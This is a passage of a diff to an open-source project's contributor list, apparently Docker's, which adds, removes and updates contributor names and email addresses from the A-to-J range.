 Ankush Agarwal <ankushagarwal11@gmail.com>
 Anonmily <michelle@michelleliu.io>
+Anran Qiao <anran.qiao@daocloud.io>
+Anshul Pundir <anshul.pundir@docker.com>
 Anthon van der Neut <anthon@mnt.org>
 Anthony Baire <Anthony.Baire@irisa.fr>
 Anthony Bishopric <git@anthonybishopric.com>
 Anthony Dahanne <anthony.dahanne@gmail.com>
+Anthony Sottile <asottile@umich.edu>
 Anton Löfgren <anton.lofgren@gmail.com>
 Anton Nikitin <anton.k.nikitin@gmail.com>
 Anton Polonskiy <anton.polonskiy@gmail.com>
@@ -136,6 +170,7 @@ Antony Messerli <amesserl@rackspace.com>
 Anuj Bahuguna <anujbahuguna.dev@gmail.com>
 Anusha Ragunathan <anusha.ragunathan@docker.com>
 apocas <petermdias@gmail.com>
+Arash Deshmeh <adeshmeh@ca.ibm.com>
 ArikaChen <eaglesora@gmail.com>
 Arnaud Lefebvre <a.lefebvre@outlook.fr>
 Arnaud Porterie <arnaud.porterie@docker.com>
@@ -143,6 +178,7 @@ Arthur Barr <arthur.barr@uk.ibm.com>
 Arthur Gautier <baloo@gandi.net>
 Artur Meyster <arthurfbi@yahoo.com>
 Arun Gupta <arun.gupta@gmail.com>
+Asad Saeeduddin <masaeedu@gmail.com>
 Asbjørn Enge <asbjorn@hanafjedle.net>
 averagehuman <averagehuman@users.noreply.github.com>
 Avi Das <andas222@gmail.com>
@@ -156,6 +192,7 @@ Barry Allard <barry.allard@gmail.com>
 Bartłomiej Piotrowski <b@bpiotrowski.pl>
 Bastiaan Bakker <bbakker@xebia.com>
 bdevloed <boris.de.vloed@gmail.com>
+Ben Bonnefoy <frenchben@docker.com>
 Ben Firshman <ben@firshman.co.uk>
 Ben Golub <ben.golub@dotcloud.com>
 Ben Hall <ben@benhall.me.uk>
@@ -164,30 +201,37 @@ Ben Severson <BenSeverson@users.noreply.github.com>
 Ben Toews <mastahyeti@gmail.com>
 Ben Wiklund <ben@daisyowl.com>
 Benjamin Atkin <ben@benatkin.com>
+Benjamin Boudreau <boudreau.benjamin@gmail.com>
+Benjamin Yolken <yolken@stripe.com>
 Benoit Chesneau <bchesneau@gmail.com>
 Bernerd Schaefer <bj.schaefer@gmail.com>
+Bernhard M. Wiedemann <bwiedemann@suse.de>
 Bert Goethals <bert@bertg.be>
 Bharath Thiruveedula <bharath_ves@hotmail.com>
 Bhiraj Butala <abhiraj.butala@gmail.com>
+Bhumika Bayani <bhumikabayani@gmail.com>
 Bilal Amarni <bilal.amarni@gmail.com>
-Bill W <SydOps@users.noreply.github.com>
-bin liu <liubin0329@users.noreply.github.com>
+Bill Wang <ozbillwang@gmail.com>
+Bin Liu <liubin0329@gmail.com>
+Bingshen Wang <bingshen.wbs@alibaba-inc.com>
 Blake Geno <blakegeno@gmail.com>
 Boaz Shuster <ripcurld.github@gmail.com>
 bobby abbott <ttobbaybbob@gmail.com>
-boucher <rboucher@gmail.com>
+Boris Pruessmann <boris@pruessmann.org>
+Boshi Lian <farmer1992@gmail.com>
 Bouke Haarsma <bouke@webatoom.nl>
 Boyd Hemphill <boyd@feedmagnet.com>
 boynux <boynux@gmail.com>
 Bradley Cicenas <bradley.cicenas@gmail.com>
 Bradley Wright <brad@intranation.com>
 Brandon Liu <bdon@bdon.org>
-Brandon Philips <brandon@ifup.org>
+Brandon Philips <brandon.philips@coreos.com>
 Brandon Rhodes <brandon@rhodesmill.org>
 Brendan Dixon <brendand@microsoft.com>
 Brent Salisbury <brent.salisbury@docker.com>
 Brett Higgins <brhiggins@arbor.net>
 Brett Kochendorfer <brett.kochendorfer@gmail.com>
+Brett Randall <javabrett@gmail.com>
 Brian (bex) Exelbierd <bexelbie@redhat.com>
 Brian Bland <brian.bland@docker.com>
 Brian DeHamer <brian@dehamer.com>
@@ -196,6 +240,7 @@ Brian Flad <bflad417@gmail.com>
 Brian Goff <cpuguy83@gmail.com>
 Brian McCallister <brianm@skife.org>
 Brian Olsen <brian@maven-group.org>
+Brian Schwind <brianmschwind@gmail.com>
 Brian Shumate <brian@couchbase.com>
 Brian Torres-Gil <brian@dralth.com>
 Brian Trump <btrump@yelp.com>
@@ -205,11 +250,11 @@ Bruno Bigras <bigras.bruno@gmail.com>
 Bruno Binet <bruno.binet@gmail.com>
 Bruno Gazzera <bgazzera@paginar.com>
 Bruno Renié <brutasse@gmail.com>
+Bruno Tavares <btavare@thoughtworks.com>
 Bryan Bess <squarejaw@bsbess.com>
 Bryan Boreham <bjboreham@gmail.com>
 Bryan Matsuo <bryan.matsuo@gmail.com>
 Bryan Murphy <bmurphy1976@gmail.com>
-buddhamagnet <buddhamagnet@gmail.com>
 Burke Libbey <burke@libbey.me>
 Byung Kang <byung.kang.ctr@amrdec.army.mil>
 Caleb Spare <cespare@gmail.com>
@@ -222,16 +267,21 @@ Cao Weiwei <cao.weiwei30@zte.com.cn>
 Carl Henrik Lunde <chlunde@ping.uio.no>
 Carl Loa Odin <carlodin@gmail.com>
 Carl X. Su <bcbcarl@gmail.com>
+Carlo Mion <mion00@gmail.com>
 Carlos Alexandro Becker <caarlos0@gmail.com>
 Carlos Sanchez <carlos@apache.org>
 Carol Fager-Higgins <carol.fager-higgins@docker.com>
 Cary <caryhartline@users.noreply.github.com>
 Casey Bisson <casey.bisson@joyent.com>
+Catalin Pirvu <pirvu.catalin94@gmail.com>
+Ce Gao <ce.gao@outlook.com>
 Cedric Davies <cedricda@microsoft.com>
 Cezar Sa Espinola <cezarsa@gmail.com>
 Chad Swenson <chadswen@gmail.com>
 Chance Zibolski <chance.zibolski@gmail.com>
-Chander G <chandergovind@gmail.com>
+Chander Govindarajan <chandergovind@gmail.com>
+Chanhun Jeong <keyolk@gmail.com>
+Chao Wang <wangchao.fnst@cn.fujitsu.com>
 Charles Chan <charleswhchan@users.noreply.github.com>
 Charles Hooper <charles.hooper@dotcloud.com>
 Charles Law <claw@conduce.com>
@@ -239,39 +289,54 @@ Charles Lindsay <chaz@chazomatic.us>
 Charles Merriam <charles.merriam@gmail.com>
 Charles Sarrazin <charles@sarraz.in>
 Charles Smith <charles.smith@docker.com>
+Charlie Drage <charlie@charliedrage.com>
 Charlie Lewis <charliel@lab41.org>
 Chase Bolt <chase.bolt@gmail.com>
 ChaYoung You <yousbe@gmail.com>
 Chen Chao <cc272309126@gmail.com>
+Chen Chuanliang <chen.chuanliang@zte.com.cn>
 Chen Hanxiao <chenhanxiao@cn.fujitsu.com>
-cheney90 <cheney-90@hotmail.com>
+Chen Min <chenmin46@huawei.com>
+Chen Mingjie <chenmingjie0828@163.com>
+Chen Qiu <cheney-90@hotmail.com>
+Cheng-mean Liu <soccerl@microsoft.com>
+Chengguang Xu <cgxu519@gmx.com>
+chenyuzhu <chenyuzhi@oschina.cn>
+Chetan Birajdar <birajdar.chetan@gmail.com>
 Chewey <prosto-chewey@users.noreply.github.com>
 Chia-liang Kao <clkao@clkao.org>
 chli <chli@freewheel.tv>
 Cholerae Hu <choleraehyq@gmail.com>
 Chris Alfonso <calfonso@redhat.com>
 Chris Armstrong <chris@opdemand.com>
+Chris Dias <cdias@microsoft.com>
 Chris Dituri <csdituri@gmail.com>
 Chris Fordham <chris@fordham-nagy.id.au>
+Chris Gavin <chris@chrisgavin.me>
+Chris Gibson <chris@chrisg.io>
 Chris Khoo <chris.khoo@gmail.com>
+Chris McKinnel <chris.mckinnel@tangentlabs.co.uk>
 Chris McKinnel <chrismckinnel@gmail.com>
 Chris Seto <chriskseto@gmail.com>
 Chris Snow <chsnow123@gmail.com>
 Chris St. Pierre <chris.a.st.pierre@gmail.com>
 Chris Stivers <chris@stivers.us>
 Chris Swan <chris.swan@iee.org>
+Chris Telfer <ctelfer@docker.com>
 Chris Wahl <github@wahlnetwork.com>
 Chris Weyl <cweyl@alumni.drew.edu>
-chrismckinnel <chris.mckinnel@tangentlabs.co.uk>
 Christian Berendt <berendt@b1-systems.de>
+Christian Brauner <christian.brauner@ubuntu.com>
 Christian Böhme <developement@boehme3d.de>
 Christian Persson <saser@live.se>
 Christian Rotzoll <ch.rotzoll@gmail.com>
 Christian Simon <simon@swine.de>
 Christian Stefanescu <st.chris@gmail.com>
-ChristoperBiscardi <biscarch@sketcht.com>
 Christophe Mehay <cmehay@online.net>
 Christophe Troestler <christophe.Troestler@umons.ac.be>
+Christophe Vidal <kriss@krizalys.com>
+Christopher Biscardi <biscarch@sketcht.com>
+Christopher Crone <christopher.crone@docker.com>
 Christopher Currie <codemonkey+github@gmail.com>
 Christopher Jones <tophj@linux.vnet.ibm.com>
 Christopher Latham <sudosurootdev@gmail.com>
@@ -281,19 +346,25 @@ Chun Chen <ramichen@tencent.com>
 Ciro S. Costa <ciro.costa@usp.br>
 Clayton Coleman <ccoleman@redhat.com>
 Clinton Kitson <clintonskitson@gmail.com>
+Cody Roseborough <crrosebo@amazon.com>
 Coenraad Loubser <coenraad@wish.org.za>
 Colin Dunklau <colin.dunklau@gmail.com>
+Colin Hebert <hebert.colin@gmail.com>
 Colin Rice <colin@daedrum.net>
 Colin Walters <walters@verbum.org>
 Collin Guarino <collin.guarino@gmail.com>
 Colm Hally <colmhally@gmail.com>
 companycy <companycy@gmail.com>
+Corbin Coleman <corbin.coleman@docker.com>
+Corey Farrell <git@cfware.com>
 Cory Forsyth <cory.forsyth@gmail.com>
 cressie176 <github@stephen-cresswell.net>
 CrimsonGlory <CrimsonGlory@users.noreply.github.com>
 Cristian Staretu <cristian.staretu@gmail.com>
 cristiano balducci <cristiano.balducci@gmail.com>
 Cruceru Calin-Cristian <crucerucalincristian@gmail.com>
+CUI Wei <ghostplant@qq.com>
+Cyprian Gracz <cyprian.gracz@micro-jumbo.eu>
 Cyril F <cyrilf7x@gmail.com>
 Daan van Berkel <daan.v.berkel.1980@gmail.com>
 Daehyeok Mun <daehyeok@gmail.com>
@@ -313,14 +384,17 @@ Dan Keder <dan.keder@gmail.com>
 Dan Levy <dan@danlevy.net>
 Dan McPherson <dmcphers@redhat.com>
 Dan Stine <sw@stinemail.com>
-Dan Walsh <dwalsh@redhat.com>
 Dan Williams <me@deedubs.com>
+Dani Louca <dani.louca@docker.com>
 Daniel Antlinger <d.antlinger@gmx.at>
+Daniel Dao <dqminh@cloudflare.com>
 Daniel Exner <dex@dragonslave.de>
 Daniel Farrell <dfarrell@redhat.com>
 Daniel Garcia <daniel@danielgarcia.info>
 Daniel Gasienica <daniel@gasienica.ch>
+Daniel Grunwell <mwgrunny@gmail.com>
 Daniel Hiltgen <daniel.hiltgen@docker.com>
+Daniel J Walsh <dwalsh@redhat.com>
 Daniel Menet <membership@sontags.ch>
 Daniel Mizyrycki <daniel.mizyrycki@dotcloud.com>
 Daniel Nephin <dnephin@docker.com>
@@ -329,22 +403,26 @@ Daniel Nordberg <dnordberg@gmail.com>
 Daniel Robinson <gottagetmac@gmail.com>
 Daniel S <dan.streby@gmail.com>
 Daniel Von Fange <daniel@leancoder.com>
+Daniel Watkins <daniel@daniel-watkins.co.uk>
 Daniel X Moore <yahivin@gmail.com>
 Daniel YC Lin <dlin.tw@gmail.com>
 Daniel Zhang <jmzwcn@gmail.com>
-Daniel, Dao Quang Minh <dqminh@cloudflare.com>
 Danny Berger <dpb587@gmail.com>
 Danny Yates <danny@codeaholics.org>
+Danyal Khaliq <danyal.khaliq@tenpearls.com>
 Darren Coxall <darren@darrencoxall.com>
 Darren Shepherd <darren.s.shepherd@gmail.com>
 Darren Stahl <darst@microsoft.com>
+Dattatraya Kumbhar <dattatraya.kumbhar@gslab.com>
 Davanum Srinivas <davanum@gmail.com>
 Dave Barboza <dbarboza@datto.com>
+Dave Goodchild <buddhamagnet@gmail.com>
 Dave Henderson <dhenderson@gmail.com>
 Dave MacDonald <mindlapse@gmail.com>
 Dave Tucker <dt@docker.com>
 David Anderson <dave@natulte.net>
 David Calavera <david.calavera@gmail.com>
+David Chung <david.chung@docker.com>
 David Corking <dmc-source@dcorking.com>
 David Cramer <davcrame@cisco.com>
 David Currie <david_currie@uk.ibm.com>
@@ -352,30 +430,36 @@ David Davis <daviddavis@redhat.com>
 David Dooling <dooling@gmail.com>
 David Gageot <david@gageot.net>
 David Gebler <davidgebler@gmail.com>
+David Glasser <glasser@davidglasser.net>
 David Lawrence <david.lawrence@docker.com>
 David Lechner <david@lechnology.com>
 David M. Karr <davidmichaelkarr@gmail.com>
 David Mackey <tdmackey@booleanhaiku.com>
 David Mat <david@davidmat.com>
 David Mcanulty <github@hellspark.com>
+David McKay <david@rawkode.com>
 David Pelaez <pelaez89@gmail.com>
 David R. Jenni <david.r.jenni@gmail.com>
 David Röthlisberger <david@rothlis.net>
-David Sheets <sheets@alum.mit.edu>
+David Sheets <dsheets@docker.com>
 David Sissitka <me@dsissitka.com>
 David Trott <github@davidtrott.com>
+David Williamson <david.williamson@docker.com>
 David Xia <dxia@spotify.com>
 David Young <yangboh@cn.ibm.com>
 Davide Ceretti <davide.ceretti@hogarthww.com>
 Dawn Chen <dawnchen@google.com>
 dbdd <wangtong2712@gmail.com>
 dcylabs <dcylabs@gmail.com>
-decadent <decadent@users.noreply.github.com>
+Deborah Gertrude Digges <deborah.gertrude.digges@gmail.com>
 deed02392 <georgehafiz@gmail.com>
 Deng Guangxing <dengguangxing@huawei.com>
 Deni Bertovic <deni@kset.org>
+Denis Defreyne <denis@soundcloud.com>
 Denis Gladkikh <denis@gladkikh.email>
 Denis Ollier <larchunix@users.noreply.github.com>
+Dennis Chen <barracks510@gmail.com>
+Dennis Chen <dennis.chen@arm.com>
 Dennis Docter <dennis@d23.nl>
 Derek <crq@kernel.org>
 Derek <crquan@gmail.com>
@@ -386,6 +470,9 @@ Deshi Xiao <dxiao@redhat.com>
 devmeyster <arthurfbi@yahoo.com>
 Devvyn Murphy <devvyn@devvyn.com>
 Dharmit Shah <shahdharmit@gmail.com>
+Dhawal Yogesh Bhanushali <dbhanushali@vmware.com>
+Diego Romero <idiegoromero@gmail.com>
+Diego Siqueira <dieg0@live.com>
 Dieter Reuter <dieter.reuter@me.com>
 Dillon Dixon <dillondixon@gmail.com>
 Dima Stopel <dima@twistlock.com>
@@ -393,6 +480,7 @@ Dimitri John Ledkov <dimitri.j.ledkov@intel.com>
 Dimitris Rozakis <dimrozakis@gmail.com>
 Dimitry Andric <d.andric@activevideo.com>
 Dinesh Subhraveti <dineshs@altiscale.com>
+Ding Fei <dingfei@stars.org.cn>
 Diogo Monica <diogo@docker.com>
 DiuDiugirl <sophia.wang@pku.edu.cn>
 Djibril Koné <kone.djibril@gmail.com>
@@ -401,10 +489,13 @@ Dmitri Logvinenko <dmitri.logvinenko@gmail.com>
 Dmitri Shuralyov <shurcooL@gmail.com>
 Dmitry Demeshchuk <demeshchuk@gmail.com>
 Dmitry Gusev <dmitry.gusev@gmail.com>
+Dmitry Kononenko <d@dm42.ru>
+Dmitry Shyshkin <dmitry@shyshkin.org.ua>
 Dmitry Smirnov <onlyjob@member.fsf.org>
 Dmitry V. Krivenok <krivenok.dmitry@gmail.com>
 Dmitry Vorobev <dimahabr@gmail.com>
 Dolph Mathews <dolph.mathews@gmail.com>
+Dominik Dingel <dingel@linux.vnet.ibm.com>
 Dominik Finkbeiner <finkes93@gmail.com>
 Dominik Honnef <dominik@honnef.co>
 Don Kirkby <donkirkby@users.noreply.github.com>
@@ -417,10 +508,12 @@ Doron Podoleanu <doronp@il.ibm.com>
 Doug Davis <dug@us.ibm.com>
 Doug MacEachern <dougm@vmware.com>
 Doug Tangren <d.tangren@gmail.com>
+Douglas Curtis <dougcurtis1@gmail.com>
 Dr Nic Williams <drnicwilliams@gmail.com>
 dragon788 <dragon788@users.noreply.github.com>
 Dražen Lučanin <kermit666@gmail.com>
 Drew Erny <drew.erny@docker.com>
+Drew Hubl <drew.hubl@gmail.com>
 Dustin Sallings <dustin@spy.net>
 Ed Costello <epc@epcostello.com>
 Edmund Wagner <edmund-wagner@web.de>
@@ -428,84 +521,105 @@ Eiichi Tsukata <devel@etsukata.com>
 Eike Herzbach <eike@herzbach.net>
 Eivin Giske Skaaren <eivinsn@axis.com>
 Eivind Uggedal <eivind@uggedal.com>
-Elan Ruusamäe <glen@delfi.ee>
+Elan Ruusamäe <glen@pld-linux.org>
+Elango Sivanandam <elango.siva@docker.com>
+Elena Morozova <lelenanam@gmail.com>
+Eli Uriegas <eli.uriegas@docker.com>
+Elias Faxö <elias.faxo@tre.se>
 Elias Probst <mail@eliasprobst.eu>
 Elijah Zupancic <elijah@zupancic.name>
 eluck <mail@eluck.me>
 Elvir Kuric <elvirkuric@gmail.com>
+Emil Davtyan <emil2k@gmail.com>
 Emil Hernvall <emil@quench.at>
 Emily Maier <emily@emilymaier.net>
 Emily Rose <emily@contactvibe.com>
 Emir Ozer <emirozer@yandex.com>
 Enguerran <engcolson@gmail.com>
 Eohyung Lee <liquidnuker@gmail.com>
+epeterso <epeterson@breakpoint-labs.com>
 Eric Barch <barch@tomesoftware.com>
+Eric Curtin <ericcurtin17@gmail.com>
+Eric G. Noriega <enoriega@vizuri.com>
 Eric Hanchrow <ehanchrow@ine.com>
 Eric Lee <thenorthsecedes@gmail.com>
 Eric Myhre <hash@exultant.us>
 Eric Paris <eparis@redhat.com>
 Eric Rafaloff <erafaloff@gmail.com>
-Eric Rosenberg <ehaydenr@users.noreply.github.com>
+Eric Rosenberg <ehaydenr@gmail.com>
 Eric Sage <eric.david.sage@gmail.com>
-Eric Windisch <eric@windisch.us>
+Eric Soderstrom <ericsoderstrom@gmail.com>
 Eric Yang <windfarer@gmail.com>
 Eric-Olivier Lamey <eo@lamey.me>
+Erica Windisch <erica@windisch.us>
 Erik Bray <erik.m.bray@gmail.com>
 Erik Dubbelboer <erik@dubbelboer.com>
 Erik Hollensbe <github@hollensbe.org>
 Erik Inge Bolsø <knan@redpill-linpro.com>
 Erik Kristensen <erik@erikkristensen.com>
+Erik St. Martin <alakriti@gmail.com>
 Erik Weathers <erikdw@gmail.com>
 Erno Hopearuoho <erno.hopearuoho@gmail.com>
 Erwin van der Koogh <info@erronis.nl>
-Euan <euank@amazon.com>
+Ethan Bell <ebgamer29@gmail.com>
+Euan Kemp <euan.kemp@coreos.com>
+Eugen Krizo <eugen.krizo@gmail.com>
 Eugene Yakubovich <eugene.yakubovich@coreos.com>
-eugenkrizo <eugen.krizo@gmail.com>
-evalle <shmarnev@gmail.com>
 Evan Allrich <evan@unguku.com>
 Evan Carmi <carmi@users.noreply.github.com>
 Evan Hazlett <ejhazlett@gmail.com>
 Evan Krall <krall@yelp.com>
 Evan Phoenix <evan@fallingsnow.net>
 Evan Wies <evan@neomantra.net>
+Evelyn Xu <evelynhsu21@gmail.com>
 Everett Toews <everett.toews@rackspace.com>
+Evgeny Shmarnev <shmarnev@gmail.com>
 Evgeny Vereshchagin <evvers@ya.ru>
 Ewa Czechowska <ewa@ai-traders.com>
 Eystein Måløy Stenberg <eystein.maloy.stenberg@cfengine.com>
 ezbercih <cem.ezberci@gmail.com>
+Ezra Silvera <ezra@il.ibm.com>
+Fabian Lauer <kontakt@softwareschmiede-saar.de>
 Fabiano Rosas <farosas@br.ibm.com>
 Fabio Falci <fabiofalci@gmail.com>
+Fabio Kung <fabio.kung@gmail.com>
 Fabio Rapposelli <fabio@vmware.com>
 Fabio Rehm <fgrehm@gmail.com>
 Fabrizio Regini <freegenie@gmail.com>
 Fabrizio Soppelsa <fsoppelsa@mirantis.com>
 Faiz Khan <faizkhan00@gmail.com>
 falmp <chico.lopes@gmail.com>
+Fangming Fang <fangming.fang@arm.com>
 Fangyuan Gao <21551127@zju.edu.cn>
 Fareed Dudhia <fareeddudhia@googlemail.com>
 Fathi Boudra <fathi.boudra@linaro.org>
 Federico Gimenez <fgimenez@coit.es>
+Felipe Oliveira <felipeweb.programador@gmail.com>
+Felix Abecassis <fabecassis@nvidia.com>
 Felix Geisendörfer <felix@debuggable.com>
-Felix Hupfeld <quofelix@users.noreply.github.com>
+Felix Hupfeld <felix@quobyte.com>
 Felix Rabe <felix@rabe.io>
-Felix Ruess <felix.ruess@roboception.de>
+Felix Ruess <felix.ruess@gmail.com>
 Felix Schindler <fschindler@weluse.de>
+Feng Yan <fy2462@gmail.com>
+Fengtu Wang <wangfengtu@huawei.com>
 Ferenc Szabo <pragmaticfrank@gmail.com>
 Fernando <fermayo@gmail.com>
 Fero Volar <alian@alian.info>
 Ferran Rodenas <frodenas@gmail.com>
 Filipe Brandenburger <filbranden@google.com>
 Filipe Oliveira <contato@fmoliveira.com.br>
-fl0yd <fl0yd@me.com>
 Flavio Castelli <fcastelli@suse.com>
-FLGMwt <ryan.stelly@live.com>
+Flavio Crisciani <flavio.crisciani@docker.com>
 Florian <FWirtz@users.noreply.github.com>
 Florian Klein <florian.klein@free.fr>
 Florian Maier <marsmensch@users.noreply.github.com>
+Florian Noeding <noeding@adobe.com>
 Florian Weingarten <flo@hackvalue.de>
 Florin Asavoaie <florin.asavoaie@gmail.com>
+Florin Patan <florinpatan@gmail.com>
 fonglh <fonglh@gmail.com>
-fortinux <fortinux@users.noreply.github.com>
+Foysal Iqbal <foysal.iqbal.fb@gmail.com>
 Francesc Campoy <campoy@google.com>
 Francis Chuang <francis.chuang@boostport.com>
 Francisco Carriedo <fcarriedo@gmail.com>
@@ -519,27 +633,36 @@ Frederick F. Kautz IV <fkautz@redhat.com>
 Frederik Loeffert <frederik@zitrusmedia.de>
 Frederik Nordahl Jul Sabroe <frederikns@gmail.com>
 Freek Kalter <freek@kalteronline.org>
-frosforever <frosforever@users.noreply.github.com>
-fy2462 <fy2462@gmail.com>
+Frieder Bluemle <frieder.bluemle@gmail.com>
 Félix Baylac-Jacqué <baylac.felix@gmail.com>
 Félix Cantournet <felix.cantournet@cloudwatt.com>
 Gabe Rosenhouse <gabe@missionst.com>
 Gabor Nagy <mail@aigeruth.hu>
+Gabriel Linder <linder.gabriel@gmail.com>
 Gabriel Monroy <gabriel@opdemand.com>
-GabrielNicolasAvellaneda <avellaneda.gabriel@gmail.com>
+Gabriel Nicolas Avellaneda <avellaneda.gabriel@gmail.com>
+Gaetan de Villele <gdevillele@gmail.com>
 Galen Sampson <galen.sampson@gmail.com>
+Gang Qiao <qiaohai8866@gmail.com>
 Gareth Rushgrove <gareth@morethanseven.net>
 Garrett Barboza <garrett@garrettbarboza.com>
+Gary Schaetz <gary@schaetzkc.com>
 Gaurav <gaurav.gosec@gmail.com>
 gautam, prasanna <prasannagautam@gmail.com>
+Gaël PORTAY <gael.portay@savoirfairelinux.com>
+Genki Takiuchi <genki@s21g.com>
 GennadySpb <lipenkov@gmail.com>
 Geoffrey Bachelet <grosfrais@gmail.com>
+George Kontridze <george@bugsnag.com>
 George MacRorie <gmacr31@gmail.com>
 George Xie <georgexsh@gmail.com>
 Georgi Hristozov <georgi@forkbomb.nl>
 Gereon Frey <gereon.frey@dynport.de>
 German DZ <germ@ndz.com.ar>
 Gert van Valkenhoef <g.h.m.van.valkenhoef@rug.nl>
+Gerwim Feiken <g.feiken@tfe.nl>
+Ghislain Bourgeois <ghislain.bourgeois@gmail.com>
+Giampaolo Mancini <giampaolo@trampolineup.com>
 Gianluca Borello <g.borello@gmail.com>
 Gildas Cuisinier <gildas.cuisinier@gcuisinier.net>
 gissehel <public-devgit-dantus@gissehel.org>
@@ -549,25 +672,29 @@ Gleb M Borisov <borisov.gleb@gmail.com>
 Glyn Normington <gnormington@gopivotal.com>
 GoBella <caili_welcome@163.com>
 Goffert van Gool <goffert@phusion.nl>
+Gopikannan Venugopalsamy <gopikannan.venugopalsamy@gmail.com>
 Gosuke Miyashita <gosukenator@gmail.com>
-Gou Rao <gourao@users.noreply.github.com>
+Gou Rao <gou@portworx.com>
 Govinda Fichtner <govinda.fichtner@googlemail.com>
 Grant Reaber <grant.reaber@gmail.com>
 Graydon Hoare <graydon@pobox.com>
 Greg Fausak <greg@tacodata.com>
+Greg Pflaum <gpflaum@users.noreply.github.com>
+Greg Stephens <greg@udon.org>
 Greg Thornton <xdissent@me.com>
-grossws <grossws@gmail.com>
-grunny <mwgrunny@gmail.com>
-gs11 <gustav.sinder@gmail.com>
+Grzegorz Jaśkiewicz <gj.jaskiewicz@gmail.com>
 Guilhem Lettron <guilhem+github@lettron.fr>
 Guilherme Salgado <gsalgado@gmail.com>
 Guillaume Dufour <gdufour.prestataire@voyages-sncf.com>
 Guillaume J. Charmes <guillaume.charmes@docker.com>
 guoxiuyan <guoxiuyan@huawei.com>
+Guri <odg0318@gmail.com>
 Gurjeet Singh <gurjeet@singh.im>
 Guruprasad <lgp171188@gmail.com>
+Gustav Sinder <gustav.sinder@gmail.com>
 gwx296173 <gaojing3@huawei.com>
 Günter Zöchbauer <guenter@gzoechbauer.com>
+Hakan Özler <hakan.ozler@kodcu.com>
 Hans Kristian Flaatten <hans@starefossen.com>
 Hans Rødtang <hansrodtang@gmail.com>
 Hao Shu Wei <haosw@cn.ibm.com>
@@ -576,13 +703,20 @@ Harald Albers <github@albersweb.de>
 Harley Laue <losinggeneration@gmail.com>
 Harold Cooper <hrldcpr@gmail.com>
 Harry Zhang <harryz@hyper.sh>
+Harshal Patil <harshal.patil@in.ibm.com>
+Harshal Patil <harshalp@linux.vnet.ibm.com>
 He Simei <hesimei@zju.edu.cn>
+He Xiaoxi <tossmilestone@gmail.com>
+He Xin <he_xinworld@126.com>
 heartlock <21521209@zju.edu.cn>
 Hector Castro <hectcastro@gmail.com>
+Helen Xie <chenjg@harmonycloud.cn>
 Henning Sprang <henning.sprang@gmail.com>
+Hiroshi Hatake <hatake@clear-code.com>
 Hobofan <goisser94@gmail.com>
 Hollie Teal <hollie@docker.com>
 Hong Xu <hong@topbug.net>
+Hongbin Lu <hongbin034@gmail.com>
 hsinko <21551195@zju.edu.cn>
 Hu Keping <hukeping@huawei.com>
 Hu Tao <hutao@cn.fujitsu.com>
@@ -594,22 +728,27 @@ Hunter Blanks <hunter@twilio.com>
 huqun <huqun@zju.edu.cn>
 Huu Nguyen <huu@prismskylabs.com>
 hyeongkyu.lee <hyeongkyu.lee@navercorp.com>
-hyp3rdino <markus.kortlang@lhsystems.com>
-Hyzhou <1187766782@qq.com>
+Hyzhou Zhy <hyzhou.zhy@alibaba-inc.com>
+Iago López Galeiras <iago@kinvolk.io>
 Ian Babrou <ibobrik@gmail.com>
 Ian Bishop <ianbishop@pace7.com>
 Ian Bull <irbull@gmail.com>
 Ian Calvert <ianjcalvert@gmail.com>
+Ian Campbell <ian.campbell@docker.com>
 Ian Lee <IanLee1521@gmail.com>
 Ian Main <imain@redhat.com>
+Ian Philpot <ian.philpot@microsoft.com>
 Ian Truslove <ian.truslove@gmail.com>
 Iavael <iavaelooeyt@gmail.com>
 Icaro Seara <icaro.seara@gmail.com>
+Ignacio Capurro <icapurrofagian@gmail.com>
 Igor Dolzhikov <bluesriverz@gmail.com>
+Igor Karpovich <i.karpovich@currencysolutions.com>
+Iliana Weller <iweller@amazon.com>
 Ilkka Laukkanen <ilkka@ilkka.io>
 Ilya Dmitrichenko <errordeveloper@gmail.com>
 Ilya Gusev <mail@igusev.ru>
-ILYA Khlopotov <ilya.khlopotov@gmail.com>
+Ilya Khlopotov <ilya.khlopotov@gmail.com>
 imre Fitos <imre.fitos+github@gmail.com>
 inglesp <peter.inglesby@gmail.com>
 Ingo Gottwald <in.gottwald@gmail.com>
@@ -619,13 +758,20 @@ Isao Jonas <isao.jonas@gmail.com>
 Ivan Babrou <ibobrik@gmail.com>
 Ivan Fraixedes <ifcdev@gmail.com>
 Ivan Grcic <igrcic@gmail.com>
+Ivan Markin <sw@nogoegst.net>
 J Bruni <joaohbruni@yahoo.com.br>
 J. Nunn <jbnunn@gmail.com>
 Jack Danger Canty <jackdanger@squareup.com>
+Jack Laxson <jackjrabbit@gmail.com>
 Jacob Atzen <jacob@jacobatzen.dk>
 Jacob Edelman <edelman.jd@gmail.com>
+Jacob Tomlinson <jacob@tom.linson.uk>
+Jacob Vallejo <jakeev@amazon.com>
+Jacob Wen <jian.w.wen@oracle.com>
+Jaivish Kothari <janonymous.codevulture@gmail.com>
 Jake Champlin <jake.champlin.27@gmail.com>
 Jake Moshenko <jake@devtable.com>
+Jake Sanders <jsand@google.com>
 jakedt <jake@devtable.com>
 James Allen <jamesallen0108@gmail.com>
 James Carey <jecarey@us.ibm.com>
@@ -636,9 +782,10 @@ James Kyburz <james.kyburz@gmail.com>
 James Kyle <james@jameskyle.org>
 James Lal <james@lightsofapollo.com>
 James Mills <prologic@shortcircuit.net.au>
+James Nesbitt <james.nesbitt@wunderkraut.com>
 James Nugent <james@jen20.com>
 James Turnbull <james@lovedthanlost.net>
-Jamie Hannaford <jamie.hannaford@rackspace.com>
+Jamie Hannaford <jamie@limetree.org>
 Jamshid Afshar <jafshar@yahoo.com>
 Jan Keromnes <janx@linux.com>
 Jan Koprowski <jan.koprowski@gmail.com>
@@ -672,9 +819,13 @@ Jay <teguhwpurwanto@gmail.com>
 Jay Kamat <github@jgkamat.33mail.com>
 Jean-Baptiste Barth <jeanbaptiste.barth@gmail.com>
 Jean-Baptiste Dalido <jeanbaptiste@appgratis.com>
+Jean-Christophe Berthon <huygens@berthon.eu>
 Jean-Paul Calderone <exarkun@twistedmatrix.com>
+Jean-Pierre Huynh <jean-pierre.huynh@ounet.fr>
 Jean-Tiare Le Bigot <jt@yadutaf.fr>
+Jeeva S. Chelladhurai <sjeeva@gmail.com>
 Jeff Anderson <jeff@docker.com>
+Jeff Hajewski <jeff.hajewski@gmail.com>
 Jeff Johnston <jeff.johnston.mn@gmail.com>
 Jeff Lindsay <progrium@gmail.com>
 Jeff Mickey <j@codemac.net>
@@ -686,28 +837,35 @@ Jeffrey Bolle <jeffreybolle@gmail.com>
 Jeffrey Morgan <jmorganca@gmail.com>
